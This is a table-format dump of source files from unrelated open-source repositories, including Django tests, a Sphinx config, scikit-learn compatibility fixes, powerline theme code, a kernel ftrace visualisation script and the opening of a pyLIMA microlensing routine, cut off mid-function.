repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, may be null ⌀)
|---|---|---|---|---|
awemulya/fieldsight-kobocat
|
refs/heads/master
|
onadata/apps/main/tests/test_form_enter_data.py
|
1
|
import os
import re
import requests
import unittest
from urlparse import urlparse
from time import time
from httmock import urlmatch, HTTMock
from django.test import RequestFactory
from django.core.urlresolvers import reverse
from django.core.validators import URLValidator
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from nose import SkipTest
from onadata.apps.main.views import set_perm, show, qrcode
from onadata.apps.main.models import MetaData
from onadata.apps.logger.views import enter_data
from onadata.libs.utils.viewer_tools import enketo_url
from test_base import TestBase
@urlmatch(netloc=r'(.*\.)?enketo\.formhub\.org$')
def enketo_mock(url, request):
response = requests.Response()
response.status_code = 201
response._content = '{"url": "https://hmh2a.enketo.formhub.org"}'
return response
@urlmatch(netloc=r'(.*\.)?enketo\.formhub\.org$')
def enketo_error_mock(url, request):
response = requests.Response()
response.status_code = 400
response._content = '{"message": ' \
'"no account exists for this OpenRosa server"}'
return response
class TestFormEnterData(TestBase):
def setUp(self):
TestBase.setUp(self)
self._create_user_and_login()
self._publish_transportation_form_and_submit_instance()
self.perm_url = reverse(set_perm, kwargs={
'username': self.user.username, 'id_string': self.xform.id_string})
self.show_url = reverse(show, kwargs={'uuid': self.xform.uuid})
self.url = reverse(enter_data, kwargs={
'username': self.user.username,
'id_string': self.xform.id_string
})
def _running_enketo(self, check_url=False):
if hasattr(settings, 'ENKETO_URL') and \
(not check_url or self._check_url(settings.ENKETO_URL)):
return True
return False
def test_enketo_remote_server(self):
if not self._running_enketo():
raise SkipTest
with HTTMock(enketo_mock):
server_url = 'https://testserver.com/bob'
form_id = "test_%s" % re.sub(re.compile("\."), "_", str(time()))
url = enketo_url(server_url, form_id)
self.assertIsInstance(url, basestring)
self.assertIsNone(URLValidator()(url))
def _get_grcode_view_response(self):
factory = RequestFactory()
request = factory.get('/')
request.user = self.user
response = qrcode(
request, self.user.username, self.xform.id_string)
return response
@unittest.skip('Fails under Django 1.6')
def test_qrcode_view(self):
with HTTMock(enketo_mock):
response = self._get_grcode_view_response()
qrfile = os.path.join(
self.this_directory, 'fixtures', 'qrcode.response')
with open(qrfile, 'r') as f:
data = f.read()
self.assertContains(response, data.strip(), status_code=200)
@unittest.skip('Fails under Django 1.6')
def test_qrcode_view_with_enketo_error(self):
with HTTMock(enketo_error_mock):
response = self._get_grcode_view_response()
self.assertEqual(response.status_code, 400)
@unittest.skip('Fails under Django 1.6')
def test_enter_data_redir(self):
if not self._running_enketo():
raise SkipTest
with HTTMock(enketo_mock):
factory = RequestFactory()
request = factory.get('/')
request.user = self.user
response = enter_data(
request, self.user.username, self.xform.id_string)
# make sure the response redirects to an enketo site
enketo_base_url = urlparse(settings.ENKETO_URL).netloc
redirected_base_url = urlparse(response['Location']).netloc
# TODO: check whether the form is valid on the enketo side
self.assertIn(enketo_base_url, redirected_base_url)
self.assertEqual(response.status_code, 302)
def test_enter_data_no_permission(self):
response = self.anon.get(self.url)
self.assertEqual(response.status_code, 403)
@unittest.skip('Fails under Django 1.6')
def test_public_with_link_to_share_toggle_on(self):
# sharing behavior as of 09/13/2012:
# it requires both data_share and form_share to be turned on
# in order to grant anon access to form uploading
# TODO: find out what 'for_user': 'all' means
response = self.client.post(self.perm_url, {'for_user': 'all',
'perm_type': 'link'})
self.assertEqual(response.status_code, 302)
self.assertEqual(MetaData.public_link(self.xform), True)
# toggle shared on
self.xform.shared = True
self.xform.shared_data = True
self.xform.save()
response = self.anon.get(self.show_url)
self.assertEqual(response.status_code, 302)
if not self._running_enketo():
raise SkipTest
with HTTMock(enketo_mock):
factory = RequestFactory()
request = factory.get('/')
request.user = AnonymousUser()
response = enter_data(
request, self.user.username, self.xform.id_string)
self.assertEqual(response.status_code, 302)
def test_enter_data_non_existent_user(self):
url = reverse(enter_data, kwargs={
'username': 'nonexistentuser',
'id_string': self.xform.id_string
})
response = self.anon.get(url)
self.assertEqual(response.status_code, 404)
|
divio/django-cms
|
refs/heads/develop
|
menus/exceptions.py
|
2
|
class NamespaceAlreadyRegistered(Exception):
pass
class NoParentFound(Exception):
pass
|
petroniocandido/pyFTS
|
refs/heads/master
|
docs/conf.py
|
1
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/stable/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../pyFTS'))
# -- Project information -----------------------------------------------------
project = 'pyFTS'
copyright = '2018, Machine Intelligence and Data Science Laboratory - UFMG - Brazil'
author = 'Machine Intelligence and Data Science Laboratory - UFMG - Brazil'
# The short X.Y version
version = '1'
# The full version, including alpha/beta/rc tags
release = '1.6'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
'sphinxcontrib.googleanalytics'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'bizstyle'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# 'full_logo': True
}
html_logo = 'logo_heading2.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyFTSdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pyFTS.tex', 'pyFTS Documentation',
'Machine Intelligence and Data Science Laboratory - UFMG - Brazil', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pyfts', 'pyFTS Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pyFTS', 'pyFTS Documentation',
author, 'pyFTS', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
googleanalytics_id = 'UA-55120145-3'
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
|
anntzer/numpy
|
refs/heads/master
|
numpy/typing/tests/data/reveal/flatiter.py
|
2
|
from typing import Any
import numpy as np
a: np.flatiter[np.ndarray[Any, np.dtype[np.str_]]]
reveal_type(a.base) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.copy()) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.coords) # E: tuple[builtins.int]
reveal_type(a.index) # E: int
reveal_type(iter(a)) # E: Iterator[numpy.str_]
reveal_type(next(a)) # E: numpy.str_
reveal_type(a[0]) # E: numpy.str_
reveal_type(a[[0, 1, 2]]) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a[...]) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a[:]) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.__array__()) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.__array__(np.float64)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
|
herilalaina/scikit-learn
|
refs/heads/master
|
sklearn/utils/fixes.py
|
10
|
"""Compatibility fixes for older version of python, numpy and scipy
If you add content to this file, please give the version of the package
at which the fixe is no longer needed.
"""
# Authors: Emmanuelle Gouillart <emmanuelle.gouillart@normalesup.org>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Fabian Pedregosa <fpedregosa@acm.org>
# Lars Buitinck
#
# License: BSD 3 clause
import warnings
import os
import errno
import numpy as np
import scipy.sparse as sp
import scipy
try:
from inspect import signature
except ImportError:
from ..externals.funcsigs import signature
def _parse_version(version_string):
version = []
for x in version_string.split('.'):
try:
version.append(int(x))
except ValueError:
# x may be of the form dev-1ea1592
version.append(x)
return tuple(version)
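# Illustrative examples (hypothetical version strings, not taken from this file):
#   _parse_version('1.13.1')            -> (1, 13, 1)
#   _parse_version('0.18.dev-1ea1592')  -> (0, 18, 'dev-1ea1592')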
euler_gamma = getattr(np, 'euler_gamma',
0.577215664901532860606512090082402431)
np_version = _parse_version(np.__version__)
sp_version = _parse_version(scipy.__version__)
# Remove when minimum required NumPy >= 1.10
try:
if (not np.allclose(np.divide(.4, 1, casting="unsafe"),
np.divide(.4, 1, casting="unsafe", dtype=np.float64))
or not np.allclose(np.divide(.4, 1), .4)):
raise TypeError('Divide not working with dtype: '
'https://github.com/numpy/numpy/issues/3484')
divide = np.divide
except TypeError:
# Compat for old versions of np.divide that do not provide support for
# the dtype args
def divide(x1, x2, out=None, dtype=None):
out_orig = out
if out is None:
out = np.asarray(x1, dtype=dtype)
if out is x1:
out = x1.copy()
else:
if out is not x1:
out[:] = x1
if dtype is not None and out.dtype != dtype:
out = out.astype(dtype)
out /= x2
if out_orig is None and np.isscalar(x1):
out = np.asscalar(out)
return out
try:
with warnings.catch_warnings(record=True):
# Don't raise the numpy deprecation warnings that appear in
# 1.9, but avoid Python bug due to simplefilter('ignore')
warnings.simplefilter('always')
sp.csr_matrix([1.0, 2.0, 3.0]).max(axis=0)
except (TypeError, AttributeError):
# in scipy < 0.14.0, sparse matrix min/max doesn't accept an `axis` argument
# the following code is taken from the scipy 0.14 codebase
def _minor_reduce(X, ufunc):
major_index = np.flatnonzero(np.diff(X.indptr))
value = ufunc.reduceat(X.data, X.indptr[major_index])
return major_index, value
def _min_or_max_axis(X, axis, min_or_max):
N = X.shape[axis]
if N == 0:
raise ValueError("zero-size array to reduction operation")
M = X.shape[1 - axis]
mat = X.tocsc() if axis == 0 else X.tocsr()
mat.sum_duplicates()
major_index, value = _minor_reduce(mat, min_or_max)
not_full = np.diff(mat.indptr)[major_index] < N
value[not_full] = min_or_max(value[not_full], 0)
mask = value != 0
major_index = np.compress(mask, major_index)
value = np.compress(mask, value)
from scipy.sparse import coo_matrix
if axis == 0:
res = coo_matrix((value, (np.zeros(len(value)), major_index)),
dtype=X.dtype, shape=(1, M))
else:
res = coo_matrix((value, (major_index, np.zeros(len(value)))),
dtype=X.dtype, shape=(M, 1))
return res.A.ravel()
def _sparse_min_or_max(X, axis, min_or_max):
if axis is None:
if 0 in X.shape:
raise ValueError("zero-size array to reduction operation")
zero = X.dtype.type(0)
if X.nnz == 0:
return zero
m = min_or_max.reduce(X.data.ravel())
if X.nnz != np.product(X.shape):
m = min_or_max(zero, m)
return m
if axis < 0:
axis += 2
if (axis == 0) or (axis == 1):
return _min_or_max_axis(X, axis, min_or_max)
else:
raise ValueError("invalid axis, use 0 for rows, or 1 for columns")
def sparse_min_max(X, axis):
return (_sparse_min_or_max(X, axis, np.minimum),
_sparse_min_or_max(X, axis, np.maximum))
else:
def sparse_min_max(X, axis):
return (X.min(axis=axis).toarray().ravel(),
X.max(axis=axis).toarray().ravel())
if sp_version < (0, 15):
# Backport fix for scikit-learn/scikit-learn#2986 / scipy/scipy#4142
from ._scipy_sparse_lsqr_backport import lsqr as sparse_lsqr
else:
from scipy.sparse.linalg import lsqr as sparse_lsqr # noqa
try: # SciPy >= 0.19
from scipy.special import comb, logsumexp
except ImportError:
from scipy.misc import comb, logsumexp # noqa
if sp_version >= (0, 19):
def _argmax(arr_or_spmatrix, axis=None):
return arr_or_spmatrix.argmax(axis=axis)
else:
# Backport of argmax functionality from scipy 0.19.1, can be removed
# once support for scipy 0.18 and below is dropped
def _find_missing_index(ind, n):
for k, a in enumerate(ind):
if k != a:
return k
k += 1
if k < n:
return k
else:
return -1
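# Illustrative examples (hypothetical inputs):
#   _find_missing_index([0, 1, 3, 4], 5) -> 2   (first gap in the sorted indices)
#   _find_missing_index([0, 1, 2], 5)    -> 3   (no gap, so the next index)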
def _arg_min_or_max_axis(self, axis, op, compare):
if self.shape[axis] == 0:
raise ValueError("Can't apply the operation along a zero-sized "
"dimension.")
if axis < 0:
axis += 2
zero = self.dtype.type(0)
mat = self.tocsc() if axis == 0 else self.tocsr()
mat.sum_duplicates()
ret_size, line_size = mat._swap(mat.shape)
ret = np.zeros(ret_size, dtype=int)
nz_lines, = np.nonzero(np.diff(mat.indptr))
for i in nz_lines:
p, q = mat.indptr[i:i + 2]
data = mat.data[p:q]
indices = mat.indices[p:q]
am = op(data)
m = data[am]
if compare(m, zero) or q - p == line_size:
ret[i] = indices[am]
else:
zero_ind = _find_missing_index(indices, line_size)
if m == zero:
ret[i] = min(am, zero_ind)
else:
ret[i] = zero_ind
if axis == 1:
ret = ret.reshape(-1, 1)
return np.asmatrix(ret)
def _arg_min_or_max(self, axis, out, op, compare):
if out is not None:
raise ValueError("Sparse matrices do not support "
"an 'out' parameter.")
# validateaxis(axis)
if axis is None:
if 0 in self.shape:
raise ValueError("Can't apply the operation to "
"an empty matrix.")
if self.nnz == 0:
return 0
else:
zero = self.dtype.type(0)
mat = self.tocoo()
mat.sum_duplicates()
am = op(mat.data)
m = mat.data[am]
if compare(m, zero):
return mat.row[am] * mat.shape[1] + mat.col[am]
else:
size = np.product(mat.shape)
if size == mat.nnz:
return am
else:
ind = mat.row * mat.shape[1] + mat.col
zero_ind = _find_missing_index(ind, size)
if m == zero:
return min(zero_ind, am)
else:
return zero_ind
return _arg_min_or_max_axis(self, axis, op, compare)
def _sparse_argmax(self, axis=None, out=None):
return _arg_min_or_max(self, axis, out, np.argmax, np.greater)
def _argmax(arr_or_matrix, axis=None):
if sp.issparse(arr_or_matrix):
return _sparse_argmax(arr_or_matrix, axis=axis)
else:
return arr_or_matrix.argmax(axis=axis)
def parallel_helper(obj, methodname, *args, **kwargs):
"""Workaround for Python 2 limitations of pickling instance methods"""
return getattr(obj, methodname)(*args, **kwargs)
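# Usage sketch (names are hypothetical; assumes joblib's Parallel/delayed are
# available): this lets an instance method be dispatched by name, e.g.
#   Parallel(n_jobs=2)(delayed(parallel_helper)(est, 'fit', X, y) for est in estimators)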
if 'exist_ok' in signature(os.makedirs).parameters:
makedirs = os.makedirs
else:
def makedirs(name, mode=0o777, exist_ok=False):
"""makedirs(name [, mode=0o777][, exist_ok=False])
Super-mkdir; create a leaf directory and all intermediate ones. Works
like mkdir, except that any intermediate path segment (not just the
rightmost) will be created if it does not exist. If the target
directory already exists, raise an OSError if exist_ok is False.
Otherwise no exception is raised. This is recursive.
"""
try:
os.makedirs(name, mode=mode)
except OSError as e:
if (not exist_ok or e.errno != errno.EEXIST
or not os.path.isdir(name)):
raise
if np_version < (1, 12):
class MaskedArray(np.ma.MaskedArray):
# Before numpy 1.12, np.ma.MaskedArray objects are not picklable
# This fix is needed to make our model_selection.GridSearchCV
# picklable as the ``cv_results_`` param uses MaskedArray
def __getstate__(self):
"""Return the internal state of the masked array, for pickling
purposes.
"""
cf = 'CF'[self.flags.fnc]
data_state = super(np.ma.MaskedArray, self).__reduce__()[2]
return data_state + (np.ma.getmaskarray(self).tostring(cf),
self._fill_value)
else:
from numpy.ma import MaskedArray # noqa
|
jideobs/twilioAngular
|
refs/heads/master
|
venv/lib/python2.7/site-packages/twilio/rest/monitor.py
|
12
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from twilio.rest.resources.monitor.alerts import Alerts
from twilio.rest.resources.monitor.events import Events
class TwilioMonitorClient(TwilioClient):
"""
A client for accessing the Twilio Monitor API.
The Twilio Monitor API provides information about events. For more
information, see the
`Monitor API documentation <https://www.twilio.com/docs/XXX>`_.
:param str account: Your Account Sid from `your dashboard
<https://www.twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://www.twilio.com/user/account>`_
:param float timeout: The socket and read timeout for requests to Twilio
"""
def __init__(self, account=None, token=None,
base="https://monitor.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioMonitorClient, self).__init__(account, token, base,
version, timeout)
self.version_uri = "%s/%s" % (base, version)
self.events = Events(self.version_uri, self.auth, timeout)
self.alerts = Alerts(self.version_uri, self.auth, timeout)
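# Minimal usage sketch (the SID/token are placeholders and the resource calls are
# assumptions based on the standard list-resource interface):
#   client = TwilioMonitorClient("ACxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "your_auth_token")
#   for event in client.events.list():
#       print(event.event_type)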
|
MSM8226-Samsung/android_kernel_samsung_ms013g
|
refs/heads/cm-13.0
|
scripts/tracing/draw_functrace.py
|
14679
|
#!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulting trace is processed into a tree to produce a more human-readable
view of the call stack by drawing a textual but hierarchical tree of
calls. Only the functions' names and the call times are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some time, but not too long: the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If no such parent is found,
then create it as a new child of root.
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
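# Illustrative example (an assumed function-tracer line, not taken from this file):
#   "<idle>-0     [000]  6328.773562: hrtimer_cancel <-tick_nohz_restart"
# parses to ("6328.773562", "hrtimer_cancel", "tick_nohz_restart").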
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
|
omergertel/chords
|
refs/heads/master
|
chords/exceptions.py
|
1
|
class ChordError(Exception):
pass
class UnsatisfiedResourcesError(ChordError):
pass
class UnknownResourceClassError(ChordError):
pass
class UnsatisfiableRequestError(ChordError):
pass
|
Luffin/powerline
|
refs/heads/develop
|
powerline/theme.py
|
23
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import itertools
from powerline.segment import gen_segment_getter, process_segment, get_fallback_segment
from powerline.lib.unicode import u, safe_unicode
def requires_segment_info(func):
func.powerline_requires_segment_info = True
return func
def requires_filesystem_watcher(func):
func.powerline_requires_filesystem_watcher = True
return func
def new_empty_segment_line():
return {
'left': [],
'right': []
}
def add_spaces_left(pl, amount, segment):
return (' ' * amount) + segment['contents']
def add_spaces_right(pl, amount, segment):
return segment['contents'] + (' ' * amount)
def add_spaces_center(pl, amount, segment):
amount, remainder = divmod(amount, 2)
return (' ' * (amount + remainder)) + segment['contents'] + (' ' * amount)
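# Illustrative example (hypothetical values): with amount=5 and a segment whose
# contents are 'ab', add_spaces_center returns '   ab  ' (the odd space goes on
# the left).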
expand_functions = {
'l': add_spaces_right,
'r': add_spaces_left,
'c': add_spaces_center,
}
class Theme(object):
def __init__(self,
ext,
theme_config,
common_config,
pl,
get_module_attr,
top_theme,
colorscheme,
main_theme_config=None,
run_once=False,
shutdown_event=None):
self.colorscheme = colorscheme
self.dividers = theme_config['dividers']
self.dividers = dict((
(key, dict((k, u(v))
for k, v in val.items()))
for key, val in self.dividers.items()
))
try:
self.cursor_space_multiplier = 1 - (theme_config['cursor_space'] / 100)
except KeyError:
self.cursor_space_multiplier = None
self.cursor_columns = theme_config.get('cursor_columns')
self.spaces = theme_config['spaces']
self.segments = []
self.EMPTY_SEGMENT = {
'contents': None,
'highlight': {'fg': False, 'bg': False, 'attrs': 0}
}
self.pl = pl
theme_configs = [theme_config]
if main_theme_config:
theme_configs.append(main_theme_config)
get_segment = gen_segment_getter(
pl,
ext,
common_config,
theme_configs,
theme_config.get('default_module'),
get_module_attr,
top_theme
)
for segdict in itertools.chain((theme_config['segments'],),
theme_config['segments'].get('above', ())):
self.segments.append(new_empty_segment_line())
for side in ['left', 'right']:
for segment in segdict.get(side, []):
segment = get_segment(segment, side)
if segment:
if not run_once:
if segment['startup']:
try:
segment['startup'](pl, shutdown_event)
except Exception as e:
pl.error('Exception during {0} startup: {1}', segment['name'], str(e))
continue
self.segments[-1][side].append(segment)
def shutdown(self):
for line in self.segments:
for segments in line.values():
for segment in segments:
try:
segment['shutdown']()
except TypeError:
pass
def get_divider(self, side='left', type='soft'):
'''Return segment divider.'''
return self.dividers[side][type]
def get_spaces(self):
return self.spaces
def get_line_number(self):
return len(self.segments)
def get_segments(self, side=None, line=0, segment_info=None, mode=None):
'''Return all segments.
Function segments are called, and all segments get their before/after
and ljust/rjust properties applied.
:param int line:
Line number for which segments should be obtained. Is counted from
zero (bottom-most line).
'''
for side in [side] if side else ['left', 'right']:
parsed_segments = []
for segment in self.segments[line][side]:
if segment['display_condition'](self.pl, segment_info, mode):
process_segment(
self.pl,
side,
segment_info,
parsed_segments,
segment,
mode,
self.colorscheme,
)
for segment in parsed_segments:
self.pl.prefix = segment['name']
try:
width = segment['width']
align = segment['align']
if width == 'auto' and segment['expand'] is None:
segment['expand'] = expand_functions.get(align)
if segment['expand'] is None:
self.pl.error('Align argument must be “r”, “l” or “c”, not “{0}”', align)
try:
segment['contents'] = segment['before'] + u(
segment['contents'] if segment['contents'] is not None else ''
) + segment['after']
except Exception as e:
self.pl.exception('Failed to compute segment contents: {0}', str(e))
segment['contents'] = safe_unicode(segment.get('contents'))
# Align segment contents
if segment['width'] and segment['width'] != 'auto':
if segment['align'] == 'l':
segment['contents'] = segment['contents'].ljust(segment['width'])
elif segment['align'] == 'r':
segment['contents'] = segment['contents'].rjust(segment['width'])
elif segment['align'] == 'c':
segment['contents'] = segment['contents'].center(segment['width'])
# We need to yield a copy of the segment, or else mode-dependent
# segment contents can’t be cached correctly e.g. when caching
# non-current window contents for vim statuslines
yield segment.copy()
except Exception as e:
self.pl.exception('Failed to compute segment: {0}', str(e))
fallback = get_fallback_segment()
fallback.update(side=side)
yield fallback
|
xgds/xgds_sample
|
refs/heads/master
|
xgds_sample/management/appCommands/prep.py
|
1
|
#__BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#__END_LICENSE__
"""
This is a place to put any prep code you need to run before your app
is ready.
For example, you might need to render some icons. The convention for
that is to put the source data in your app's media_src directory and
render the icons into your app's build/media directory (outside version
control).
How this script gets run: when the site admin runs "./manage.py prep",
one of the steps is "prepapps", which calls each app's
management/appCommands/prep.py command (if it exists).
"""
from django.core.management.base import NoArgsCommand
from geocamUtil.management import commandUtil
class Command(NoArgsCommand):
help = 'Prep xgds_sample'
def handle_noargs(self, **options):
# put your code here
pass
|
NetApp/manila
|
refs/heads/master
|
manila/tests/fake_notifier.py
|
7
|
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from manila import rpc
NOTIFICATIONS = []
def reset():
del NOTIFICATIONS[:]
FakeMessage = collections.namedtuple(
'Message',
['publisher_id', 'priority', 'event_type', 'payload'],
)
class FakeNotifier(object):
def __init__(self, transport, publisher_id, serializer=None):
self.transport = transport
self.publisher_id = publisher_id
for priority in ['debug', 'info', 'warn', 'error', 'critical']:
setattr(self, priority,
functools.partial(self._notify, priority.upper()))
self._serializer = serializer or messaging.serializer.NoOpSerializer()
def prepare(self, publisher_id=None):
if publisher_id is None:
publisher_id = self.publisher_id
return self.__class__(self.transport, publisher_id, self._serializer)
def _notify(self, priority, ctxt, event_type, payload):
payload = self._serializer.serialize_entity(ctxt, payload)
# NOTE(sileht): simulate the kombu serializer
# this permits raising an exception if something has not
# been serialized correctly
jsonutils.to_primitive(payload)
msg = dict(publisher_id=self.publisher_id,
priority=priority,
event_type=event_type,
payload=payload)
NOTIFICATIONS.append(msg)
def stub_notifier(testcase):
testcase.mock_object(messaging, 'Notifier', FakeNotifier)
if rpc.NOTIFIER:
serializer = getattr(rpc.NOTIFIER, '_serializer', None)
testcase.mock_object(rpc, 'NOTIFIER',
FakeNotifier(rpc.NOTIFIER.transport,
rpc.NOTIFIER.publisher_id,
serializer=serializer))
|
ebachelet/pyLIMA
|
refs/heads/master
|
pyLIMA/microlguess.py
|
1
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 23 16:00:51 2016
@author: ebachelet
"""
import numpy as np
import scipy.signal as ss
from pyLIMA import microltoolbox
def initial_guess_PSPL(event):
"""Function to find initial PSPL guess for Levenberg-Marquardt solver (method=='LM').
This assumes no blending.
:param object event: the event object on which you perform the fit. More details in the
event module.
:return: the PSPL guess for this event. A list of parameters associated to the PSPL model + the source flux of
the survey telescope.
:rtype: list,float
"""
# to estimation
to_estimations = []
maximum_flux_estimations = []
errors_magnitude = []
for telescope in event.telescopes:
# A lot of processing here; if one telescope fails, just skip it
lightcurve_magnitude = telescope.lightcurve_magnitude
mean_error_magnitude = np.mean(lightcurve_magnitude[:, 2])
try:
# only the best photometry
good_photometry_indexes = np.where((lightcurve_magnitude[:, 2] <
max(0.1, mean_error_magnitude)))[0]
lightcurve_bis = lightcurve_magnitude[good_photometry_indexes]
lightcurve_bis = lightcurve_bis[lightcurve_bis[:, 0].argsort(), :]
mag = lightcurve_bis[:, 1]
